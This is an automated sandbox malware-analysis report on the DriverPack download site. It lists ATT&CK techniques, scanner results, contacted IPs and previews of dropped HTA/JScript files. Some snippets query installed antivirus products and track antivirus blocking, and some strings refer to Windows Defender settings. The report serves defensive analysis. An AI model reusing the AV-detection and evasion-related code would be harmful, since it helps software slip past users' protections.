Cached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Scripting
DCSync135
System Information Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Rundll32
Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://driverpack.io/en1%VirustotalBrowse
https://driverpack.io/en0%Avira URL Cloudsafe
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\0dd887da71734c28a6a6e75a968f9978$dpx$.tmp\7631337e95cef14bace29cbeb07a102c.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\0dd887da71734c28a6a6e75a968f9978$dpx$.tmp\7631337e95cef14bace29cbeb07a102c.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\0dd887da71734c28a6a6e75a968f9978$dpx$.tmp\92c6e2e1b8024b469ba59a029d8b5ccc.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\0dd887da71734c28a6a6e75a968f9978$dpx$.tmp\92c6e2e1b8024b469ba59a029d8b5ccc.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\0dd887da71734c28a6a6e75a968f9978$dpx$.tmp\da26bf756ce0e246836f60c74d3d9c9b.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\0dd887da71734c28a6a6e75a968f9978$dpx$.tmp\da26bf756ce0e246836f60c74d3d9c9b.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\aria2c.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\aria2c.exe2%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\devcon64.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\devcon64.exe0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-7za.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-7za.exe0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameMaliciousAntivirus DetectionReputation
https://driverpack.io/enfalse
    high
    https://googleads.g.doubleclick.net/pagead/html/r20230823/r20190131/zrt_lookup.htmlfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      142.250.186.68
      unknownUnited States
      15169GOOGLEUSfalse
      142.250.185.99
      unknownUnited States
      15169GOOGLEUSfalse
      142.250.185.100
      unknownUnited States
      15169GOOGLEUSfalse
      216.239.32.36
      unknownUnited States
      15169GOOGLEUSfalse
      172.217.23.110
      unknownUnited States
      15169GOOGLEUSfalse
      142.250.181.238
      unknownUnited States
      15169GOOGLEUSfalse
      142.250.13.155
      unknownUnited States
      15169GOOGLEUSfalse
      142.251.143.67
      unknownUnited States
      15169GOOGLEUSfalse
      216.239.32.116
      unknownUnited States
      15169GOOGLEUSfalse
      142.250.186.35
      unknownUnited States
      15169GOOGLEUSfalse
      104.20.168.62
      unknownUnited States
      13335CLOUDFLARENETUSfalse
      9.9.9.9
      unknownUnited States
      19281QUAD9-AS-1USfalse
      87.117.235.115
      unknownUnited Kingdom
      20860IOMART-ASGBfalse
      1.1.1.1
      unknownAustralia
      13335CLOUDFLARENETUSfalse
      34.104.35.123
      unknownUnited States
      15169GOOGLEUSfalse
      172.217.16.205
      unknownUnited States
      15169GOOGLEUSfalse
      172.217.18.3
      unknownUnited States
      15169GOOGLEUSfalse
      142.250.185.110
      unknownUnited States
      15169GOOGLEUSfalse
      142.250.185.232
      unknownUnited States
      15169GOOGLEUSfalse
      18.157.122.248
      unknownUnited States
      16509AMAZON-02USfalse
      239.255.255.250
      unknownReserved
      unknownunknownfalse
      81.94.192.167
      unknownUnited Kingdom
      20860IOMART-ASGBfalse
      188.114.97.3
      unknownEuropean Union
      13335CLOUDFLARENETUSfalse
      87.117.231.157
      unknownUnited Kingdom
      20860IOMART-ASGBfalse
      142.250.185.194
      unknownUnited States
      15169GOOGLEUSfalse
      142.250.185.195
      unknownUnited States
      15169GOOGLEUSfalse
      46.137.15.86
      unknownIreland
      16509AMAZON-02USfalse
      77.88.21.119
      unknownRussian Federation
      13238YANDEXRUfalse
      18.195.235.189
      unknownUnited States
      16509AMAZON-02USfalse
      216.58.212.162
      unknownUnited States
      15169GOOGLEUSfalse
      216.58.212.163
      unknownUnited States
      15169GOOGLEUSfalse
      37.9.8.75
      unknownRussian Federation
      49505SELECTELRUfalse
      87.117.239.150
      unknownUnited Kingdom
      20860IOMART-ASGBfalse
      34.120.195.249
      unknownUnited States
      15169GOOGLEUSfalse
      87.117.239.151
      unknownUnited Kingdom
      20860IOMART-ASGBfalse
      142.250.184.234
      unknownUnited States
      15169GOOGLEUSfalse
      IP
      192.168.2.3
      Joe Sandbox Version:38.0.0 Beryl
      Analysis ID:1298587
      Start date and time:2023-08-28 11:32:23 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsinteractivecookbook.jbs
      Sample URL:https://driverpack.io/en
      Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
      Number of analysed new started processes analysed:62
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      Analysis Mode:stream
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal96.phis.expl.evad.win@116/860@0/236
      • Exclude process from analysis (whitelisted): WmiPrvSE.exe
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtDeviceIoControlFile calls found.
      • Report size getting too big, too many NtEnumerateKey calls found.
      • Report size getting too big, too many NtOpenFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.
      • Report size getting too big, too many NtWriteFile calls found.
      • Skipping network analysis since amount of network traffic is too extensive
      • Timeout during stream target processing, analysis might miss dynamic analysis data
      • VT rate limit hit for: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:MPEG ADTS, layer III, v2, 32 kbps, 24 kHz, Monaural
      Category:dropped
      Size (bytes):24577
      Entropy (8bit):7.652207256930882
      Encrypted:false
      SSDEEP:
      MD5:5DFD5AC5C08A629DB586C6B737905FFD
      SHA1:7D7418EC5C0099CE47476CFC63D160AE2F25D16D
      SHA-256:F01CE28BDB7AF9B93ED9E255D5F2C4B7860C97D2F0D58339DBD489828B3484BA
      SHA-512:90E301B3CC64BA21517823767F5AC44DFD72FCC64EB40B5156C1186C466F2BF1A3E2035F316EE55709051FA47A1FD344E5FDDFC88586A55396481E59ADEDD26D
      Malicious:false
      Reputation:low
      Preview:..D...h]\.O..V2Do9.8..h.7%.apTJ.f6}.. ....0'.....@".........a....p .....;.?..~ 8S(......._....D....*,..P.......~x.ou.I...M''9...*..04....E..s%...@`...._...F.tV........1.4.rJ.....Q.,&..(..D...!...8.j...1...7.$........>7eC..9...Q........{...<.Pp|uH..XjZ...-........I..B....1...D...a....X..@..DP.*..?.........g.I.....J.S^sN.F.jhn....w1l..F6....$..^.7..$9FC`..j.....3......D...i....._H4.........8g....8."....TG.....$.|.&..w[?ka....R6....QW.0.E...._?i;.......2....D...q...Z..N.3.....cXg.L....C^....s"..S......+.SMF).}....K....Rf*...WX...Z.e(X..i..-...d....D...AB...p......T..!...,)Pg<../...%+...u.|..{..-~>o=q..|k...N.........F2.^.-...w .........D........p.n .G...g...{?~.......9.S.BD.n.:0!..RB!.(......z?.....0...B..)..gK....*."...jY....D....*....p.'B..)Y.G.W..KRE.8p.^.....9.....E...?....}.......9.iR...|f.6_\DL...S..R.<6..2..D.#.."....p...M&..<..$...I.......]....:X:..u......{...........Y]...0f...|.r..r.E".T...J.....D./.......L^...:.%.c.C:o.S...].Q....t
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:HTML document, ASCII text
      Category:dropped
      Size (bytes):151
      Entropy (8bit):4.8512847748396215
      Encrypted:false
      SSDEEP:
      MD5:27EAE1E26E0E1E4E1E7B32F5C71C123B
      SHA1:1A565DE1FB99ECED4D4B49DD595B3BB688266FB3
      SHA-256:0EE1AA4D336DF8C124641F85195EC9CBD59FFB79EFA76FDBF76D9F01CCB4B31B
      SHA-512:5FC814749FBEEFFF4017B14034A535C2F55BF9C861CD0614D74606632DEC4E844EF59061CBD83D113B462A12DA2867A7D5D2B2888F06558F91A215162B00AC58
      Malicious:false
      Reputation:low
      Preview:<html>..<head>...<title>DriverPack Solution</title>...<meta http-equiv="refresh" content="0; URL=http://drp.su/">..</head>..<body>.....</body>.</html>.
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:HTML document, ASCII text
      Category:dropped
      Size (bytes):331
      Entropy (8bit):5.170958896270178
      Encrypted:false
      SSDEEP:
      MD5:286E2FDC03C56C9DCDAF44C82E3BCFD7
      SHA1:14D1505F52EC86DF1BB88B4C438D613444F18626
      SHA-256:3280C6AFDE17C96514107F0749C3267105C4D6D63EEDCC4082D8B1DBA2FB7CCD
      SHA-512:8126FEBB62D6FC45DD2ABCC42C2BAC95FE6AAB754C9AF4A374853BEBE172EBEB3498A04C62B6514806E89C89EAB857316A841EA0726E532F4773D97C7DB217B5
      Malicious:false
      Reputation:low
      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://allfont.ru/cache/css/lucida-console.css">here</a>.</p>.<hr>.<address>Apache/2.4.29 (Ubuntu) Server at allfont.ru Port 80</address>.</body></html>.
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:GIF image data, version 89a, 1 x 1
      Category:dropped
      Size (bytes):35
      Entropy (8bit):2.9889227488523016
      Encrypted:false
      SSDEEP:
      MD5:28D6814F309EA289F847C69CF91194C6
      SHA1:0F4E929DD5BB2564F7AB9C76338E04E292A42ACE
      SHA-256:8337212354871836E6763A41E615916C89BAC5B3F1F0ADF60BA43C7C806E1015
      SHA-512:1D68B92E8D822FE82DC7563EDD7B37F3418A02A89F1A9F0454CCA664C2FC2565235E0D85540FF9BE0B20175BE3F5B7B4EAE1175067465D5CCA13486AAB4C582C
      Malicious:false
      Reputation:low
      Preview:GIF89a.............,...........D..;
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (570)
      Category:dropped
      Size (bytes):171784
      Entropy (8bit):5.548563466062146
      Encrypted:false
      SSDEEP:
      MD5:8C482EBB1044C5161F257C6DFDD57C6C
      SHA1:D1AEE26D0A7BCA559AAC4DAF04FD6939FC1F3BA6
      SHA-256:5C497674756FC9CD152D1AD10D8F9CEA88C128818647469C8C21C166CC40B315
      SHA-512:9E76C4DF5D619D4F8917EEBE09F9E2BC0F442D3FF0F518B08AD61587737E46BFA0D46A6D2D07FD239315686CA2EF9B896C725ABC5B0ACB19CCBFF83146E45B1D
      Malicious:false
      Reputation:low
      Preview:.(function(){try{(function(){function ne(a,c,b,d){var e=this;return y(window,"c.i",function(){function f(u){(u=oe(k,l,"",u)(k,l))&&(T(u.then)?u.then(g):g(u));return u}function g(u){u&&(T(u)?m.push(u):ja(u)&&B(function(A){var Q=A[0];A=A[1];T(A)&&("u"===Q?m.push(A):h(A,Q))},Ba(u)))}function h(u,A,Q){e[A]=Fk(k,l,Q||p,A,u)}var k=window;(!k||isNaN(a)&&!a)&&pe();var l=Gk(a,qe,c,b,d),m=[],p=[sg,oe,tg];p.unshift(Hk);var q=D(O,tb),w=K(l);l.id||Sa(nc("Invalid Metrika id: "+l.id,!0));var x=Jc.C("counters",{});if(x[w])return ub(k,.w,"Duplicate counter "+w+" initialization"),x[w];x[w]=e;Jc.D("counters",x);Jc.wa("counter",e);B(function(u){u(k,l)},wd);B(f,Kc);f(Ik);h(Jk(k,l,m),"destruct",[sg,tg]);bc(k,E([k,q,f,1,"a.i"],Kk));B(f,S)})()}function Lk(a,c){var b;if("https://oauth.yandex.ru"===n(c,"origin")&&n(c,"source.window")&&"_ym_uid_request"===n(c.data,"_ym")){var d=c.source,e=(b={},b._ym_uid=a,b);d.postMessage(e,"https://oauth.yandex.ru")}}function Mk(a){var c=W(Boolean,D(function(b){var d=b[1];re
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):5086
      Entropy (8bit):5.422218540561902
      Encrypted:false
      SSDEEP:
      MD5:22D3D08CBEC1245327396FAA5B60725A
      SHA1:71DFB22D57F73CD5390F1991B6013AB44CD7351A
      SHA-256:923CBFF9E47CA64E292A8932A13ED11F9E4A488DC20775181B010231F15E3E26
      SHA-512:D90B4C383077038D436B9E125240B62CFD928D24940E464A93FC88A0C76F1F1EE79E617CCCE0F41FBF1DF3D660C3764E323F02674E2F45BBA0CD31B957E09D92
      Malicious:false
      Reputation:low
      Preview:.if (typeof loadedJS !== "undefined") { loadedJS.push("2.js"); }....function getCurrentDirectory() {...var fso = new ActiveXObject("Scripting.FileSystemObject");...var htaPath = fso.GetAbsolutePathName(document.location.pathname);...var directory = fso.GetParentFolderName(htaPath);.....var baseUrl = document.location.href.split("/").slice(0, -1).join("/");...var htaUrl = baseUrl + "/" + fso.GetFileName(htaPath);...if (htaUrl === document.location.href) {....return baseUrl;...}...return directory;..}..var current_dir = getCurrentDirectory();........// Detect OS..var is64 = false;..if (WshShell.ExpandEnvironmentStrings("%PROCESSOR_ARCHITECTURE%") == "AMD64"...|| WshShell.ExpandEnvironmentStrings("%PROCESSOR_ARCHITEW6432%") != "%PROCESSOR_ARCHITEW6432%") {...is64 = true;..}......var OSVersion = 5;..var OSVersionSP = 0;....var colItems = objWMIService.ExecQuery("SELECT * FROM Win32_OperatingSystem", "WQL");..var enumItems = new Enumerator(colItems);..for (; !enumItems.atEnd(); enumItems.
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):2538
      Entropy (8bit):5.676353904867985
      Encrypted:false
      SSDEEP:
      MD5:CC9E168614A8D567352E24F970CA21E0
      SHA1:623C06BB9699F5AD91C4D19199A0F3780FC76A4D
      SHA-256:578820B83CD0244FFC068665C531A8C7D633F890A927A682A1708B84B7A08702
      SHA-512:A98DACDE394030A590E9D31941F71B8FBA3544EDCA2F17188FA940B314E58A8139FD62CF664A3D49264C8812053F5E869ECB6700A2B2A7BDCABD3C731C224D2F
      Malicious:false
      Reputation:low
      Preview:.if (typeof loadedJS !== "undefined") { loadedJS.push("3.js"); }....// Read registry..// ToDo: ......... ....-.....!!!..function RegRead(key) {.....key = key.replace('HKEY_LOCAL_MACHINE\\', 'HKLM\\');...key = key.replace('HKEY_CURRENT_USER\\', 'HKCU\\');.....ret = RegRead32(key);.....if ((!ret) && (key.indexOf('\\SOFTWARE\\Microsoft\\') != -1)) {....var t_key = key.replace('\\SOFTWARE\\Microsoft\\', '\\SOFTWARE\\Wow6432Node\\Microsoft\\');......ret = RegRead32(t_key);...}.....if (!ret && is64) {....ret = RegRead64(key);...}.....return ret;....}....function RegRead32(key) {...var ret = "";...try { ret = WshShell.RegRead(key); }...catch (e) { ret = ""; }...return ret;..}......function RegRead64(key) {...try {....var HKEY_LOCAL_MACHINE = 0x80000002;....var HKEY_CURRENT_USER = 0x80000001;......var context = new ActiveXObject("WbemScripting.SWbemNamedValueSet");....context.Add("__ProviderArchitecture", 64);....context.Add("__RequiredArchitecture", true);....var locator =
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):1157
      Entropy (8bit):5.443625546433963
      Encrypted:false
      SSDEEP:
      MD5:B21247B2428E6D9F72405EB1A2F5F75C
      SHA1:11C6612989710432AE9730C2C20CE7EE9F0DF609
      SHA-256:9DDF298484BD63F71CFF04DD81E00913266FA8D71793E2C26F3B7B215067812C
      SHA-512:D3060F786D378680DA1917F7E00878A2012C6B9C497693B0C01BECF5D896F2681E851FB4F6724710A6E9C755D988A0828DF55B0966B431A38756355B9ACD0EBB
      Malicious:false
      Reputation:low
      Preview:.if (typeof loadedJS !== "undefined") { loadedJS.push("4.js"); }....function generateClientID() {...var generateRandomNumber = Math.floor(Math.random() * 1e16);...var getCurrentTimestamp = new Date().getTime();...return generateRandomNumber + "." + getCurrentTimestamp;..}....// .......... . ....... Client ID..if (RegExists(Reg + 'clientID')) {...window.clientID = RegRead(Reg + 'clientID');..}..else {...window.clientID = generateClientID();...RegWrite(Reg + 'clientID', window.clientID)..}......// Open url..function goToUrl(url) {...lf('goToUrl');...try {....defBrowser = RegRead("HKCU\\SOFTWARE\\Clients\\StartMenuInternet\\");....if (!defBrowser) defBrowser = RegRead("HKLM\\SOFTWARE\\Clients\\StartMenuInternet\\");....runComm = RegRead("HKLM\\SOFTWARE\\Clients\\StartMenuInternet\\" + defBrowser + "\\shell\\open\\command\\");....runComm = runComm.replace(/"/ig, '');....if (runComm).....WshShell.Run('"' + runComm + '" ' + '"' + url + '"', 1, false);....else.....window.o
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):5
      Entropy (8bit):1.5219280948873621
      Encrypted:false
      SSDEEP:
      MD5:FDA44910DEB1A460BE4AC5D56D61D837
      SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
      SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
      SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
      Malicious:false
      Reputation:low
      Preview:0....
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):500
      Entropy (8bit):5.0067587705199115
      Encrypted:false
      SSDEEP:
      MD5:F3DBA245C9BC4A3ACCFC65884EF5F09D
      SHA1:34A438A441A331CE509F083AA81DC8F10EF85FB6
      SHA-256:95B1796C0C4DA527750E267592CD616CD8BEB73FD12119D33FFE40EA0E7F2574
      SHA-512:46AEB86558C6046A6799386B95920976B3BD8048BDDCC047927DBE0C3D91BF3E94DC9F82C36C54F11A94787CCB891642135237E33B3512CBB54EDC654A9E3E00
      Malicious:false
      Reputation:low
      Preview:/*****************************. All rights reserved.. AllFont.ru (c) 2011-2015. *****************************/.@font-face {. font-family: 'Lucida Console';. font-style: normal;. font-weight: 400;. src: local('Lucida Console'), local('LucidaConsole-Regular'),. url(http://allfont.ru/cache/fonts/lucida-console_e4dbf36e72813249c56c7fc8ca220bbd.woff) format('woff'),. url(http://allfont.ru/cache/fonts/lucida-console_e4dbf36e72813249c56c7fc8ca220bbd.ttf) format('truetype');.}.
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):1304
      Entropy (8bit):5.371258741762522
      Encrypted:false
      SSDEEP:
      MD5:4BDB642A191FD4BF5A806A7B7478633A
      SHA1:2A7CDBB5C072655F4B4899FCE40AA273037495B7
      SHA-256:494AACB6BA9D44FED47D20ADEA0FF2C597E6E1439C4D0694BC9EECB4AF77D096
      SHA-512:63C248F44E4F93E5D6E513D19E526D77C7D483FC36182951805552E87BC8E4C7DF79BF63407AE382C9804A915D4C576FE5ECDE1E464EB87FDECEFF21B34CADFE
      Malicious:false
      Reputation:low
      Preview:.if (typeof loadedJS !== "undefined") { loadedJS.push("1.js"); }....var version = "0.14";..var buildDate = "2023/04/02"; // YYYY/MM/DD..var Reg = "HKCU\\SOFTWARE\\dwrapper\\";....var WshShell = new ActiveXObject("WScript.Shell");..var WshEnv = WshShell.Environment("PROCESS");..var AppData = WshShell.SpecialFolders("AppData");..var ProgramFiles = WshShell.ExpandEnvironmentStrings("%ProgramFiles%");..var ProgramFilesX86 = WshShell.ExpandEnvironmentStrings("%ProgramFiles(x86)%");..var tempDir = WshShell.ExpandEnvironmentStrings("%TEMP%");..var fso = new ActiveXObject("Scripting.FileSystemObject");..var locator = new ActiveXObject("WbemScripting.SWbemLocator");..var objWMIService = locator.ConnectServer(null, "root\\cimv2");..var objShell = new ActiveXObject("Shell.Application");..document.title = document.title + " " + version;....//Resize window../*..(function () {...try {....var screenWidth = (screen.availWidth ? screen.availWidth : screen.width);....var screenHeight = (screen.availHe
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):538
      Entropy (8bit):5.280112968479041
      Encrypted:false
      SSDEEP:
      MD5:AEEE81BB12D7059393E42828191765C2
      SHA1:733A7D859097567B2B7FEAACE0498AD68C0F429D
      SHA-256:F9156E0C0A06207EB66A51AB364A05E37E0273242F9373F8378F6E0DEB705D0B
      SHA-512:E0ACB5A0A51677276124BEFD4AE8AAB0558C0BC95C5E7B70F6F2212367ECCFA9BEC85827D9CE6FD8BEF09A59D48A262CC0C155B72FAAECF897154E35C9219189
      Malicious:false
      Reputation:low
      Preview:.if (typeof loadedJS !== "undefined") { loadedJS.push("5.js"); }....function addLoadEvent(func) {...var oldonload = window.onload;...if (typeof window.onload != "function") {....window.onload = func;...} else {....window.onload = function () {.....if (oldonload) {......oldonload();.....}.....func();....};...}...// ......... ......... ......... . ........ ....... ..... .., .... ........ ... ...........if (document.readyState === "complete") {....func();...}..}
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):21396
      Entropy (8bit):5.0694470346237885
      Encrypted:false
      SSDEEP:
      MD5:831A41C03D798ED1D81D28D0CA73E207
      SHA1:C7ECA68ACB4A3CD08FBF3412E7F5B4099F1B3B38
      SHA-256:16C2C8B68EDD61443F2C96C0E2C18FD7346FA4AAAE70D7A796CA2F233FA43CC6
      SHA-512:2E04471D042CA61690E9F7E73AECED5D7AB35D4923AE165254AF7A62553CFA3824FBBBC879183D7742342D0A7F613FA549296F59B160B60CBD9E89725899A188
      Malicious:false
      Reputation:low
      Preview:.if (typeof loadedJS !== "undefined") { loadedJS.push("av.js"); }....var wmiAvaliable = true;..function getWmiService() {.. var locator, wmiService;.... try {.. locator = new ActiveXObject("WbemScripting.SWbemLocator");.. wmiService = locator.ConnectServer(null, "root\\SecurityCenter2");.. } catch (e) {.. wmiService = null;.. wmiAvaliable = false;.. }.... return wmiService;..}....function getProductInfo(productEnum, type, productMap) {.. for (; !productEnum.atEnd(); productEnum.moveNext()) {.. var product = productEnum.item();.. var productState = parseInt(product.productState, 10).toString(16);.. var state = productState.substring(productState.length - 4, productState.length - 2);.. var upToDateState = parseInt(product.productUptoDate, 10).toString(16);.. var state2 = upToDateState.substring(upToDateState.length - 2, upToDateState.length);.... var productInfo = {.. name: product.displa
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):32
      Entropy (8bit):4.366729296672174
      Encrypted:false
      SSDEEP:
      MD5:CB0961DC5E4EF8A65FCED210127E0A81
      SHA1:5F12E7E880C1F55B381387F272FF3886C9C30200
      SHA-256:AA94678D98B5CF607C2AA1A11419E884A125BDC8077F3B8B75F2C7A91E13EFC5
      SHA-512:0BE97D2D51CCFE869B613CE8729C865D92DE922232E39B4D80281AD7BAFFF00D4080D8FE1DB6EECE937A30E2F7689F6A09C1E5184120E789801427ACC9CF3AE0
      Malicious:false
      Reputation:low
      Preview:var clientIp = "102.129.143.89";
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (343), with CRLF line terminators
      Category:dropped
      Size (bytes):23348
      Entropy (8bit):5.178133195501094
      Encrypted:false
      SSDEEP:
      MD5:AF96B7A7C6BF51A7918CD02FCE041F74
      SHA1:A48F32D782BCCC98C6E94679936BD8C061CE5FE5
      SHA-256:4563ABBBC8EC43F992DB49D208DC552D7FBA98BA7D115456C4E506A89E10EA4B
      SHA-512:C7B540448C27C7288E715657DC240439ECA590C936C9E42C4ACB038D70A25557E61AAF1E23CE2E0190EB9E64A8CE07249BBE1096E0F31EC527CED14A0CA93147
      Malicious:false
      Reputation:low
      Preview:.if (typeof loadedJS !== "undefined") { loadedJS.push("download.js"); }......//.... ..., ......... ......... ......... ...., .... ..... ....... mshta ............ ....... ............ ...... ..........try {.. window.resizeTo(windowWidth, windowHeight + 1);.. window.resizeTo(windowWidth, windowHeight - 1);..} catch (error) {.. sendMatomoEvent({.. trackEvent: {.. category: 'Wrapper / Antivirus blocks',.. action: '......... ............ ....... window.resizeTo()'.. }.. });..}..setInterval(function () {.. if (BitsDownloadFinished === true) { return false; }.... try {.. window.resizeTo(windowWidth, windowHeight + 1);.. } catch (error) { }.. setTimeout(function () {.. try {.. window.resizeTo(windowWidth, windowHeight - 1);.. } catch (error) { }.. }, 50)..}, 100);....//..
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):6687
      Entropy (8bit):5.654839855577387
      Encrypted:false
      SSDEEP:
      MD5:DAE972AFAE277C877DBD1373B2202BAB
      SHA1:F11C127C639E06C19E447F589458889E95C5E013
      SHA-256:87569B2EEC82C09EB4828761B1B95D58016924EDB54BE2BBD72014E7B3A41EF7
      SHA-512:87EDB5591CFF8ED1ACE048EEBF8A748970E851BFC16E5144D5D155E1FEFFDF22E1CD5F8BD88CC8A8035CAD238BD852436B959B6B6152D194471B822B5515FF27
      Malicious:false
      Reputation:low
      Preview:.<!DOCTYPE html>..<html>....<head>...<title>Download</title>... ->.. <meta http-equiv="X-UA-Compatible" content="IE=7">.. -->...<HTA:APPLICATION ID="dwrapper" APPLICATIONNAME="dwrapper" ICON="%windir%\System32\magnify.exe" WIDTH="700"....HEIGHT="600" CONTEXTMENU="yes" SELECTION="yes" APPLICATION="no" BORDER="none" CAPTION="no" INNERBORDER="no"....MAXIMIZEBUTTON="yes" MINIMIZEBUTTON="yes" NAVIGABLE="yes" SCROLL="no" SCROLLFLAT="no" SHOWINTASKBAR="yes"....SINGLEINSTANCE="no" SYSMENU="yes" VERSION="0.1" WINDOWSTATE="normal" />.....<script type="text/javascript">....window.onload = function () {.....setTimeout(function () {......if (typeof logMissingScripts !== "undefined") {.......logMissingScripts();......}......else {.......sendMatomoEvent({........trackEvent: {.........category: 'Wrapper / Errors',.........action: '...... .......... logMissingScripts()'........}.......});......}.....}, 500);.......updateAntivirusInfo(1000, function (antivirusProdu
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):67231
      Entropy (8bit):5.549452833601988
      Encrypted:false
      SSDEEP:
      MD5:0F8AA7C95F02FF49F1FBAE3D5817F2F9
      SHA1:3FEC254401BCDEC1D2DB5F23F9E02155E096571F
      SHA-256:685F7D5BF2AF77F561B24F8E4B2363503A76690D70B179BB55B161317BA47676
      SHA-512:CA3B3AB35E5F79A734727642A2AC76EBE20BED0552ECDDB116CFDF903BA1666A6A48B5837FD1F06B1B3969C360F5F07A6ED73D8882C7C09DBFFB919D9BB1CB8C
      Malicious:false
      Reputation:low
      Preview:.if (typeof loadedJS !== "undefined") { loadedJS.push("lang.js"); }....var l = {.. ru: {.. 'defender_instruction_win7_1': '1. ........ ......... ..........: <a href="#" onclick="openDefenderSettingsWin7(); return false;">......... Windows Defender</a><br>',.. 'defender_instruction_win7_2': '2. ....... .. ...... "........." . ....... ...... ....<br>',.. 'defender_instruction_win7_3': '3. . ....... "...... . ........ ......." ....... ...... . ..... "............ ...... . ...... ......... ......."<br>',.. 'defender_instruction_win7_4': '4. ....... .. ...... ".........".<br><br>',.... 'defender_instruction_win8_1': '1. ........ ......... ..........: <a href="#" onclick="openDefenderSettingsWin7(); return false;">......... Wind
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:GIF image data, version 89a, 30 x 30
      Category:dropped
      Size (bytes):4471
      Entropy (8bit):7.131886719007336
      Encrypted:false
      SSDEEP:
      MD5:8AC3FE752CAA6CE3B06ADDF13922FCA2
      SHA1:21345CE381E0B3573D920B1CDBF5C02F096A84FB
